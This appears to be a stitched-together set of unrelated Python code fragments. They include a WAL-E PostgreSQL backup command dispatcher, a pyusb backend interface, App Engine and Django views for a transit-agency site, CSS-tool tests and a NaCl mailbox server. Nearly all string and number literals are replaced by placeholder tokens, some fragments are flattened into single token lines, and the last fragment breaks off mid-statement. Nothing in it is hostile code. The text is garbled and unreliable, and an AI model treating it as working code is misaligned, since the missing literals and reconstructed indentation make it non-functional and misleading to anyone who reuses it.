                # (located via CONFIG_BIN) is.
                external_program_check([CONFIG_BIN])
                parser = PgControlDataParser(args.PG_CLUSTER_DIRECTORY)
                controldata_bin = parser.controldata_bin()
                external_programs = [
                    LZOP_BIN,
                    PV_BIN,
                    controldata_bin]
            else:
                external_programs = [LZOP_BIN, PSQL_BIN, PV_BIN]
            external_program_check(external_programs)
            rate_limit = args.rate_limit
            while_offline = args.while_offline
            backup_cxt.database_backup(
                args.PG_CLUSTER_DIRECTORY,
                rate_limit=rate_limit,
                while_offline=while_offline,
                pool_size=args.pool_size)
        elif subcommand == '<STR_LIT>':
            external_program_check([LZOP_BIN])
            res = backup_cxt.wal_restore(args.WAL_SEGMENT,
                                         args.WAL_DESTINATION,
                                         args.prefetch)
            if not res:
                # Restore failed; nonzero exit signals archive_command.
                sys.exit(<NUM_LIT:1>)
        elif subcommand == '<STR_LIT>':
            external_program_check([LZOP_BIN])
            backup_cxt.wal_prefetch(args.BASE_DIRECTORY, args.SEGMENT)
        elif subcommand == '<STR_LIT>':
            external_program_check([LZOP_BIN])
            backup_cxt.wal_archive(args.WAL_SEGMENT,
                                   concurrency=args.pool_size)
        elif subcommand == '<STR_LIT>':
            # Destructive only when dry-run is off AND --confirm given.
            if args.dry_run is False and args.confirm is True:
                logger.info(msg='<STR_LIT>')
                is_dry_run_really = False
            else:
                logger.info(msg='<STR_LIT>')
                is_dry_run_really = True

                # NOTE(review): indentation reconstructed — in a dry run,
                # boto's delete entry points are stubbed to assert, making
                # accidental deletion impossible; confirm against upstream.
                import boto.s3.key
                import boto.s3.bucket

                def just_error(*args, **kwargs):
                    assert False, ('<STR_LIT>'
                                   '<STR_LIT>')

                boto.s3.key.Key.delete = just_error
                boto.s3.bucket.Bucket.delete_keys = just_error

            if args.delete_subcommand == '<STR_LIT>':
                backup_cxt.delete_old_versions(is_dry_run_really)
            elif args.delete_subcommand == '<STR_LIT>':
                backup_cxt.delete_all(is_dry_run_really)
            elif args.delete_subcommand == '<STR_LIT>':
                backup_cxt.delete_with_retention(is_dry_run_really,
                                                 args.NUM_TO_RETAIN)
            elif args.delete_subcommand == '<STR_LIT>':
                segment_info = extract_segment(args.BEFORE_SEGMENT_EXCLUSIVE)
                assert segment_info is not None
                backup_cxt.delete_before(is_dry_run_really, segment_info)
            else:
                # argparse should have rejected anything else.
                assert False, '<STR_LIT>'
        else:
            logger.error(msg='<STR_LIT>',
                         detail=('<STR_LIT>'
                                 .format(subcommand)),
                         hint='<STR_LIT>')
            sys.exit(<NUM_LIT>)

        # Deferred worker exceptions: log all but the last, re-raise last.
        if backup_cxt.exceptions:
            for exc in backup_cxt.exceptions[:-<NUM_LIT:1>]:
                if isinstance(exc, UserException):
                    logger.log(level=exc.severity,
                               msg=exc.msg, detail=exc.detail, hint=exc.hint)
                else:
                    logger.error(msg=exc)
            raise backup_cxt.exceptions[-<NUM_LIT:1>]

    except UserException, e:
        logger.log(level=e.severity,
                   msg=e.msg, detail=e.detail, hint=e.hint)
        sys.exit(<NUM_LIT:1>)
    except Exception, e:
        logger.critical(
            msg='<STR_LIT>',
            detail='<STR_LIT>'.join(traceback.format_exception(*sys.exc_info())))
        sys.exit(<NUM_LIT:2>)
# Package facade: re-export the S3 worker primitives at package level so
# callers can import them from wal_e.worker.s3 directly.
from wal_e.worker.s3.s3_deleter import Deleter
from wal_e.worker.s3.s3_worker import BackupFetcher
from wal_e.worker.s3.s3_worker import BackupList
from wal_e.worker.s3.s3_worker import DeleteFromContext
from wal_e.worker.s3.s3_worker import TarPartitionLister

# Public API; the five placeholder entries presumably name the five
# classes imported above — TODO confirm against the original literals.
__all__ = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]
r"""<STR_LIT>"""

import usb._objfinalizer as _objfinalizer

__author__ = '<STR_LIT>'

__all__ = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']


def _not_implemented(func):
    # Uniform "abstract method" failure: every unimplemented backend hook
    # raises NotImplementedError carrying the method's name.
    raise NotImplementedError(func.__name__)


class IBackend(_objfinalizer.AutoFinalizedObject):
    r"""<STR_LIT>"""
    # Abstract USB backend interface.  Every method below is a stub that
    # raises NotImplementedError; concrete backends (libusb0/1, openusb)
    # override the subset they support.

    # -- device discovery / descriptor access ---------------------------

    def enumerate_devices(self):
        r"""<STR_LIT>"""
        _not_implemented(self.enumerate_devices)

    def get_device_descriptor(self, dev):
        r"""<STR_LIT>"""
        _not_implemented(self.get_device_descriptor)

    def get_configuration_descriptor(self, dev, config):
        r"""<STR_LIT>"""
        _not_implemented(self.get_configuration_descriptor)

    def get_interface_descriptor(self, dev, intf, alt, config):
        r"""<STR_LIT>"""
        _not_implemented(self.get_interface_descriptor)

    def get_endpoint_descriptor(self, dev, ep, intf, alt, config):
        r"""<STR_LIT>"""
        _not_implemented(self.get_endpoint_descriptor)

    # -- device lifecycle -----------------------------------------------

    def open_device(self, dev):
        r"""<STR_LIT>"""
        _not_implemented(self.open_device)

    def close_device(self, dev_handle):
        r"""<STR_LIT>"""
        _not_implemented(self.close_device)

    # -- configuration / interface management ---------------------------

    def set_configuration(self, dev_handle, config_value):
        r"""<STR_LIT>"""
        _not_implemented(self.set_configuration)

    def get_configuration(self, dev_handle):
        r"""<STR_LIT>"""
        _not_implemented(self.get_configuration)

    def set_interface_altsetting(self, dev_handle, intf, altsetting):
        r"""<STR_LIT>"""
        _not_implemented(self.set_interface_altsetting)

    def claim_interface(self, dev_handle, intf):
        r"""<STR_LIT>"""
        _not_implemented(self.claim_interface)

    def release_interface(self, dev_handle, intf):
        r"""<STR_LIT>"""
        _not_implemented(self.release_interface)

    # -- data transfer (bulk / interrupt / isochronous / control) -------

    def bulk_write(self, dev_handle, ep, intf, data, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.bulk_write)

    def bulk_read(self, dev_handle, ep, intf, buff, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.bulk_read)

    def intr_write(self, dev_handle, ep, intf, data, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.intr_write)

    def intr_read(self, dev_handle, ep, intf, size, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.intr_read)

    def iso_write(self, dev_handle, ep, intf, data, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.iso_write)

    def iso_read(self, dev_handle, ep, intf, size, timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.iso_read)

    def ctrl_transfer(self,
                      dev_handle,
                      bmRequestType,
                      bRequest,
                      wValue,
                      wIndex,
                      data,
                      timeout):
        r"""<STR_LIT>"""
        _not_implemented(self.ctrl_transfer)

    # -- device control -------------------------------------------------

    def clear_halt(self, dev_handle, ep):
        r"""<STR_LIT>"""
        _not_implemented(self.clear_halt)

    def reset_device(self, dev_handle):
        r"""<STR_LIT>"""
        _not_implemented(self.reset_device)

    # -- kernel driver management ---------------------------------------

    def is_kernel_driver_active(self, dev_handle, intf):
        r"""<STR_LIT>"""
        _not_implemented(self.is_kernel_driver_active)

    def detach_kernel_driver(self, dev_handle, intf):
        r"""<STR_LIT>"""
        _not_implemented(self.detach_kernel_driver)

    def attach_kernel_driver(self, dev_handle, intf):
        r"""<STR_LIT>"""
        _not_implemented(self.attach_kernel_driver)
<s> import os <EOL> import re <EOL> import sys <EOL> import random <EOL> from . import core <EOL> README = """<STR_LIT>""" <EOL> Makefile = """<STR_LIT>""" <EOL> setup = """<STR_LIT>""" <EOL> myprogramd = """<STR_LIT>""" <EOL> myprogramctl = """<STR_LIT>""" <EOL> def init_new_project ( program ) : <EOL> if os . listdir ( '<STR_LIT:.>' ) != [ ] : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> name = os . path . basename ( os . getcwd ( ) ) <EOL> src_dir = '<STR_LIT>' . format ( name ) <EOL> os . mkdir ( src_dir ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( README . replace ( '<STR_LIT>' , name ) . lstrip ( ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( setup . replace ( '<STR_LIT>' , name ) . lstrip ( ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> data = Makefile . replace ( '<STR_LIT>' , name ) . lstrip ( ) <EOL> data = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , data ) <EOL> fh . write ( data ) <EOL> files = [ <EOL> ( '<STR_LIT>' , myprogramd ) , <EOL> ( '<STR_LIT>' , myprogramctl ) ] <EOL> random_string = '<STR_LIT>' . join ( random . sample ( [ chr ( i ) for i in range ( <NUM_LIT> , <NUM_LIT> ) ] , <NUM_LIT:10> ) ) <EOL> for filename , var in files : <EOL> filename = filename . replace ( '<STR_LIT>' , name ) <EOL> with open ( os . path . join ( src_dir , filename ) , '<STR_LIT:w>' ) as fh : <EOL> var = var . replace ( '<STR_LIT>' , name ) . lstrip ( ) <EOL> var = var . replace ( '<STR_LIT>' , random_string ) <EOL> fh . write ( var ) <EOL> with open ( os . path . join ( src_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( "<STR_LIT>" ) <EOL> with open ( os . path . join ( src_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fh : <EOL> pass <EOL> def main ( ) : <EOL> program = core . CtlProgram ( <EOL> '<STR_LIT>' , None ) <EOL> program . add_command ( '<STR_LIT>' , init_new_project ) <EOL> program . 
run ( loop = False ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
from google.appengine.ext import db


class NamedStat(db.Model):
    # A single named float counter stored in the App Engine datastore.
    name = db.StringProperty()    # stat identifier, queried by equality
    value = db.FloatProperty()    # current value; initialized to 0.0

    @staticmethod
    def get_stat(name):
        # Fetch the stat entity by name, creating and persisting a
        # zero-valued one on first use.
        stats = NamedStat.all().filter("<STR_LIT>", name).get()
        if stats is None:
            stats = NamedStat(name=name, value=<NUM_LIT:0.0>)
            try:
                stats.put()
            except db.TimeoutException:
                # Single best-effort retry on a datastore timeout; a second
                # timeout propagates to the caller.
                stats.put()
        return stats

    @staticmethod
    def get_value(name):
        # Convenience accessor for the current value.
        return NamedStat.get_stat(name).value

    @staticmethod
    def set_value(name, value):
        # Overwrite the stat's value.  No retry here, unlike get_stat /
        # increment — a TimeoutException propagates.
        stats = NamedStat.get_stat(name)
        stats.value = value
        stats.put()

    @staticmethod
    def increment(name):
        # NOTE(review): non-transactional read-modify-write — concurrent
        # increments can lose updates.  db.run_in_transaction would make
        # this safe; left as-is to preserve behavior.
        stats = NamedStat.get_stat(name)
        stats.value = stats.value + <NUM_LIT:1.0>
        try:
            stats.put()
        except db.TimeoutException:
            # Single retry on timeout, mirroring get_stat.
            stats.put()
        return stats.value
# Django views for transit-agency pages on Google App Engine.
# NOTE(review): recovered from a tokenized stream; literal placeholders
# stand in for the original strings and indentation was reconstructed.
import time
import logging
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from google.appengine.ext import db
from google.appengine.api import memcache
from google.appengine.api import users
from ..decorators import memcache_parameterized_view_response
from ..forms import AgencyForm
from ..models import Agency, FeedReference, TransitApp
from ..utils.view import render_to_response, redirect_to, not_implemented, bad_request, render_to_json
from ..utils.misc import uniquify, chunk_sequence
from ..utils.geocode import geocode_name
from StringIO import StringIO
import csv


def edit_agency(request, agency_id=None):
    # Create-or-edit form handler: with an id, edit that Agency; without,
    # create a new one on POST.  Many optional fields map "" -> None.
    if agency_id is not None:
        agency = Agency.get_by_id(int(agency_id))
    else:
        agency = None

    if request.method == '<STR_LIT:POST>':
        form = AgencyForm(request.POST)
        if form.is_valid():
            if agency is None:
                # New entity seeded with the identifying fields.
                agency = Agency(name=form.cleaned_data['<STR_LIT:name>'],
                                city=form.cleaned_data['<STR_LIT>'],
                                state=form.cleaned_data['<STR_LIT:state>'],
                                country=form.cleaned_data['<STR_LIT>'])
            agency.name = form.cleaned_data['<STR_LIT:name>']
            agency.short_name = form.cleaned_data['<STR_LIT>']
            agency.city = form.cleaned_data['<STR_LIT>']
            agency.state = form.cleaned_data['<STR_LIT:state>']
            agency.country = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.postal_code = form.cleaned_data['<STR_LIT>']
            agency.address = form.cleaned_data['<STR_LIT:address>']
            agency.agency_url = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.executive = form.cleaned_data['<STR_LIT>']
            agency.executive_email = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.twitter = form.cleaned_data['<STR_LIT>']
            agency.contact_email = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.updated = form.cleaned_data['<STR_LIT>']
            agency.phone = form.cleaned_data['<STR_LIT>']
            # Comma-separated ids -> list; empty string -> empty list.
            agency.gtfs_data_exchange_id = form.cleaned_data['<STR_LIT>'].split("<STR_LIT:U+002C>") if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else []
            agency.dev_site = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.arrival_data = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.position_data = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            agency.standard_license = form.cleaned_data['<STR_LIT>'] if form.cleaned_data['<STR_LIT>'] != "<STR_LIT>" else None
            # Derive geo position and slugs before persisting.
            agency.location = geocode_name(agency.city, agency.state)
            agency.update_location()
            agency.update_slugs()
            agency.put()
    else:
        if agency is None:
            form = AgencyForm()
        else:
            # Pre-populate the form from the stored entity.
            form = AgencyForm(initial={'<STR_LIT:name>': agency.name,
                                       '<STR_LIT>': agency.short_name,
                                       '<STR_LIT>': agency.city,
                                       '<STR_LIT:state>': agency.state,
                                       '<STR_LIT>': agency.country,
                                       '<STR_LIT>': agency.postal_code,
                                       '<STR_LIT:address>': agency.address,
                                       '<STR_LIT>': agency.agency_url,
                                       '<STR_LIT>': agency.executive,
                                       '<STR_LIT>': agency.executive_email,
                                       '<STR_LIT>': agency.twitter,
                                       '<STR_LIT>': agency.contact_email,
                                       '<STR_LIT>': agency.updated,
                                       '<STR_LIT>': agency.phone,
                                       '<STR_LIT>': "<STR_LIT:U+002C>".join(agency.gtfs_data_exchange_id),
                                       '<STR_LIT>': agency.dev_site,
                                       '<STR_LIT>': agency.arrival_data,
                                       '<STR_LIT>': agency.position_data,
                                       '<STR_LIT>': agency.standard_license, })

    return render_to_response(request, "<STR_LIT>", {'<STR_LIT>': agency, '<STR_LIT>': form})


def agency_app_counts(request):
    # JSON endpoint: per-agency application counts.
    return render_to_json(TransitApp.agency_app_counts())


def safe_str(item):
    """<STR_LIT>"""
    # NOTE(review): Python 2 — calling .encode("utf8") on a byte `str`
    # implicitly decodes it as ASCII first and raises UnicodeDecodeError
    # for non-ASCII bytes; also `type(x) ==` should be isinstance.  Left
    # as-is to preserve behavior.
    if type(item) == str or type(item) == unicode:
        return item.encode("<STR_LIT:utf8>")
    else:
        return str(item)


@memcache_parameterized_view_response(time=settings.MEMCACHE_PAGE_SECONDS)
def agencies(request, countryslug='<STR_LIT>', stateslug='<STR_LIT>', cityslug='<STR_LIT>', nameslug='<STR_LIT>'):
    # Agency listing / detail view.  With a nameslug: a single-agency
    # page.  Otherwise: a list filtered by location slugs, with optional
    # JSON or CSV output selected by a query parameter.
    if nameslug:
        urlslug = '<STR_LIT:/>'.join([countryslug, stateslug, cityslug, nameslug])
        agency = Agency.all().filter('<STR_LIT>', urlslug).get()
        feeds = FeedReference.all().filter('<STR_LIT>', agency.gtfs_data_exchange_id)
        apps = TransitApp.iter_for_agency(agency)
        template_vars = {
            '<STR_LIT>': agency,
            '<STR_LIT>': feeds,
            '<STR_LIT>': apps,
        }
        return render_to_response(request, "<STR_LIT>", template_vars)

    agency_list = Agency.fetch_for_slugs(countryslug, stateslug, cityslug)

    # JSON output branch.
    if request.GET.get('<STR_LIT>') == '<STR_LIT>':
        jsonable_list = []
        for agency in agency_list:
            jsonable_list.append(agency.to_jsonable())
        return render_to_json(jsonable_list)

    # CSV output branch: header taken from the first row's keys.
    if request.GET.get('<STR_LIT>') == '<STR_LIT>':
        jsonable_list = []
        for agency in agency_list:
            jsonable_list.append(agency.to_jsonable())
        if len(jsonable_list) > <NUM_LIT:0>:
            csv_buffer = StringIO()
            csv_writer = csv.writer(csv_buffer)
            header = jsonable_list[<NUM_LIT:0>].keys()
            csv_writer.writerow(header)
            for item in jsonable_list:
                csv_writer.writerow([safe_str(item[header_col]) for header_col in header])
            return HttpResponse(content=csv_buffer.getvalue(), mimetype="<STR_LIT>")
        else:
            return HttpResponse(content="<STR_LIT>", mimetype="<STR_LIT>")

    # HTML branch: tally public vs. non-public agencies and mark hidden
    # rows according to the requested filter.
    public_filter = request.GET.get('<STR_LIT>', '<STR_LIT:all>')
    public_count = no_public_count = <NUM_LIT:0>

    location = {'<STR_LIT>': None, '<STR_LIT:state>': None, '<STR_LIT>': None}
    if cityslug:
        location['<STR_LIT>'] = cityslug
    if stateslug:
        location['<STR_LIT:state>'] = stateslug
    if countryslug:
        location['<STR_LIT>'] = countryslug
    location_string = cityslug or stateslug or countryslug

    # NOTE(review): enhanced_list is built but never read afterwards —
    # template_vars passes agency_list instead; possibly dead code.
    enhanced_list = [];
    for a in agency_list:
        if a.date_opened:
            public_count += <NUM_LIT:1>
            if public_filter == '<STR_LIT>':
                a.hide = True
        else:
            no_public_count += <NUM_LIT:1>
            if public_filter == '<STR_LIT>':
                a.hide = True
        enhanced_list.append(a)

    if countryslug:
        page_title = "<STR_LIT>" % location_string.upper();
    else:
        page_title = "<STR_LIT>"

    template_vars = {
        '<STR_LIT>': agency_list,
        '<STR_LIT:location>': location,
        '<STR_LIT>': location_string,
        '<STR_LIT>': public_count,
        '<STR_LIT>': public_filter,
        '<STR_LIT>': no_public_count,
        '<STR_LIT>': Agency.get_state_list(),
        '<STR_LIT>': Agency.get_country_list(),
        '<STR_LIT>': len(agency_list),
        '<STR_LIT>': FeedReference.all_by_most_recent(),
        '<STR_LIT>': users.is_current_user_admin(),
        '<STR_LIT>': page_title,
        '<STR_LIT>': request.META['<STR_LIT>'] + "<STR_LIT:?>" + request.META['<STR_LIT>'],
    }
    return render_to_response(request, "<STR_LIT>", template_vars)


def generate_locations(request):
    """<STR_LIT>"""
    # Intentionally unimplemented.
    pass


def admin_agencies_list(request):
    # Admin view: partition feeds into matched (referenced by some agency's
    # gtfs_data_exchange_id) and unmatched, plus agencies with no feed ids.
    matched_gtfs_data_exchange_ids = set()
    unmatched_agencies = set()
    unmatched_feeds = set()
    for agency in Agency.all():
        if len(agency.gtfs_data_exchange_id) != <NUM_LIT:0>:
            for gtfsdeid in agency.gtfs_data_exchange_id:
                matched_gtfs_data_exchange_ids.add(gtfsdeid)
        else:
            unmatched_agencies.add(agency)
    for feed in FeedReference.all():
        if feed.gtfs_data_exchange_id not in matched_gtfs_data_exchange_ids:
            unmatched_feeds.add(feed)
    # NOTE(review): unmatched_agencies is collected but not passed to the
    # template.
    return render_to_response(request, "<STR_LIT>", {'<STR_LIT>': Agency.all(), '<STR_LIT>': unmatched_feeds})


def admin_agencies_update_locations(request):
    # Recompute every agency's location, persisting in batches of 100 to
    # stay within datastore limits.
    agencies = [agency for agency in Agency.all()]
    for agency in agencies:
        agency.update_location()
    for agencies_chunk in chunk_sequence(agencies, <NUM_LIT:100>):
        db.put(agencies_chunk)
    return render_to_response(request, "<STR_LIT>")


def delete_all_agencies(request):
    # Bulk delete: keys-only query, deleted in batches of 100.
    keys = [key for key in Agency.all(keys_only=True)]
    for keys_chunk in chunk_sequence(keys, <NUM_LIT:100>):
        db.delete(keys_chunk)
    return render_to_response(request, "<STR_LIT>")


def delete_agency(request, agency_id):
    # Delete one agency, first detaching it from every app that explicitly
    # lists it (apps persisted in batches of 10).
    agency = Agency.get_by_id(int(agency_id))
    explicit_apps = TransitApp.fetch_for_explicit_agency(agency)
    for explicit_app in explicit_apps:
        explicit_app.remove_explicitly_supported_agency(agency)
    for explicit_app_chunk in chunk_sequence(explicit_apps, <NUM_LIT:10>):
        db.put(explicit_app_chunk)
    agency.delete()
    return redirect_to("<STR_LIT>")


def create_agency_from_feed(request, feed_id):
    # Seed a new Agency from a FeedReference, then jump to its edit page.
    feed = FeedReference.all().filter("<STR_LIT>", feed_id).get()
    agency = Agency(name=feed.name,
                    short_name=feed.name,
                    city=feed.area if feed.area != "<STR_LIT>" else "<STR_LIT>",
                    state=feed.state if feed.state != "<STR_LIT>" else "<STR_LIT>",
                    country=feed.country,
                    agency_url=feed.url,
                    gtfs_data_exchange_id=[feed_id])
    agency.put()
    return redirect_to("<STR_LIT>", agency_id=agency.key().id())


def make_everything_public(request):
    """<STR_LIT>"""
    # Batch migration endpoint: walk up to n agencies starting at offset,
    # forcing private != True rows to an explicit False, and report tallies.
    things_an_agency_can_be = {}
    n = int(request.GET.get("<STR_LIT:n>", <NUM_LIT:1000>))
    offset = int(request.GET.get("<STR_LIT>", <NUM_LIT:0>))
    i = <NUM_LIT:0>
    count = <NUM_LIT:0>
    for agency in Agency.all().fetch(n, offset):
        # Histogram of observed `private` values (None/False/True).
        things_an_agency_can_be[agency.private] = things_an_agency_can_be.get(agency.private, <NUM_LIT:0>) + <NUM_LIT:1>
        if agency.private != True:
            agency.private = False
            agency.put()
            # NOTE(review): indentation reconstructed — i counts updated
            # rows, count counts all visited rows; confirm against upstream.
            i += <NUM_LIT:1>
        count += <NUM_LIT:1>
    all_public_count = Agency.all().filter("<STR_LIT>", False).count()
    all_private_count = Agency.all().filter("<STR_LIT>", True).count()
    all_all_count = Agency.all().count()
    return HttpResponse("<STR_LIT>" % (n, offset, i, all_public_count, all_private_count, i, all_all_count, count, things_an_agency_can_be))
<s> from . TextReporter import TextReporter <EOL> from . JsonReporter import JsonReporter <EOL> from . XMLReporter import XMLReporter <EOL> class ReporterUtil ( ) : <EOL> @ staticmethod <EOL> def getReporter ( reporterType , checker ) : <EOL> if reporterType == '<STR_LIT:text>' : <EOL> return TextReporter ( checker ) <EOL> elif reporterType == '<STR_LIT>' : <EOL> return JsonReporter ( checker ) </s>
<s> from helper import * <EOL> def doTest ( ) : <EOL> _basic ( ) <EOL> _with_hack ( ) <EOL> _with_extra ( ) <EOL> _with_different_level ( ) <EOL> _with_css3_props ( ) <EOL> def _basic ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_hack ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_extra ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_different_level ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_css3_props ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from helper import * <EOL> def doTest ( ) : <EOL> fixer , msg = doFix ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> styleSheet = fixer . getStyleSheet ( ) <EOL> equal ( len ( styleSheet . getRuleSets ( ) ) , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> ruleSet = styleSheet . getRuleSets ( ) [ <NUM_LIT:0> ] <EOL> equal ( ruleSet . selector , '<STR_LIT>' , '<STR_LIT>' ) <EOL> width = ruleSet . getRuleByName ( '<STR_LIT:width>' ) <EOL> equal ( width . fixedValue , "<STR_LIT>" , '<STR_LIT>' ) <EOL> equal ( width . value , '<STR_LIT>' , '<STR_LIT>' ) <EOL> color = ruleSet . getRuleByName ( '<STR_LIT>' ) <EOL> equal ( color . fixedValue , '<STR_LIT>' , '<STR_LIT>' ) <EOL> equal ( color . value , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import os , struct , time , base64 <EOL> from twisted . application import service , internet <EOL> from twisted . web import server , resource , http <EOL> from nacl . public import PrivateKey , PublicKey , Box <EOL> from nacl . secret import SecretBox <EOL> from . . import rrid <EOL> from . . eventual import eventually <EOL> from . . util import remove_prefix , split_into , hex_or_none , unhex_or_none <EOL> from . . netstring import split_netstrings_and_trailer <EOL> from . . web import EventsProtocol <EOL> def parseMsgA ( msgA ) : <EOL> key_and_boxed = remove_prefix ( msgA , "<STR_LIT>" ) <EOL> pubkey1_s , boxed = split_into ( key_and_boxed , [ <NUM_LIT:32> ] , True ) <EOL> return pubkey1_s , boxed <EOL> def parseMsgB ( msgB ) : <EOL> ( MSTT , ) , msgC = split_netstrings_and_trailer ( msgB ) <EOL> return MSTT , msgC <EOL> class ServerResource ( resource . Resource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message_handler ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . message_handler = message_handler <EOL> def render_POST ( self , request ) : <EOL> msgA = request . content . read ( ) <EOL> self . message_handler ( msgA ) <EOL> return "<STR_LIT>" <EOL> class BaseServer ( service . MultiService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> service . MultiService . __init__ ( self ) <EOL> class HTTPMailboxServer ( BaseServer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , db , web , baseurl , desc ) : <EOL> BaseServer . __init__ ( self ) <EOL> self . db = db <EOL> assert baseurl . endswith ( "<STR_LIT:/>" ) <EOL> self . baseurl = baseurl <EOL> self . transport_privkey = PrivateKey ( desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> self . TT_privkey = desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . TT_pubkey = desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . retrieval_privkey = PrivateKey ( desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> web . get_root ( ) . 
putChild ( "<STR_LIT>" , ServerResource ( self . handle_msgA ) ) <EOL> r = resource . Resource ( ) <EOL> self . listres = RetrievalListResource ( self . db , self . retrieval_privkey ) <EOL> r . putChild ( "<STR_LIT:list>" , self . listres ) <EOL> ts = internet . TimerService ( self . listres . CLOCK_WINDOW * <NUM_LIT:3> , <EOL> self . prune_old_requests ) <EOL> ts . setServiceParent ( self ) <EOL> r . putChild ( "<STR_LIT>" , RetrievalFetchResource ( self . db ) ) <EOL> r . putChild ( "<STR_LIT>" , RetrievalDeleteResource ( self . db ) ) <EOL> web . get_root ( ) . putChild ( "<STR_LIT>" , r ) <EOL> def allocate_transport ( self , remote = True ) : <EOL> symkey = None <EOL> if remote : <EOL> symkey = os . urandom ( <NUM_LIT:32> ) <EOL> RT = os . urandom ( <NUM_LIT:8> ) <EOL> TTID , TT0 = rrid . create_token ( self . TT_pubkey ) <EOL> return self . add_transport ( TTID , TT0 , RT , symkey ) <EOL> def add_transport ( self , TTID , TT0 , RT , symkey ) : <EOL> tid = self . db . insert ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( TTID . encode ( "<STR_LIT>" ) , TT0 . encode ( "<STR_LIT>" ) , <EOL> hex_or_none ( RT ) , hex_or_none ( symkey ) ) , <EOL> "<STR_LIT>" ) <EOL> self . db . commit ( ) <EOL> return tid <EOL> def get_local_transport ( self ) : <EOL> row = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . fetchone ( ) <EOL> if not row : <EOL> return self . allocate_transport ( False ) <EOL> return row [ "<STR_LIT:id>" ] <EOL> def get_tid_data ( self , tid ) : <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( tid , ) ) <EOL> row = c . fetchone ( ) <EOL> return ( row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) , row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) , <EOL> unhex_or_none ( row [ "<STR_LIT>" ] ) , unhex_or_none ( row [ "<STR_LIT>" ] ) ) <EOL> def get_mailbox_record ( self , tid ) : <EOL> ( TTID , TT0 , RT , symkey ) = self . get_tid_data ( tid ) <EOL> if symkey : <EOL> rpubkey = self . retrieval_privkey . public_key . 
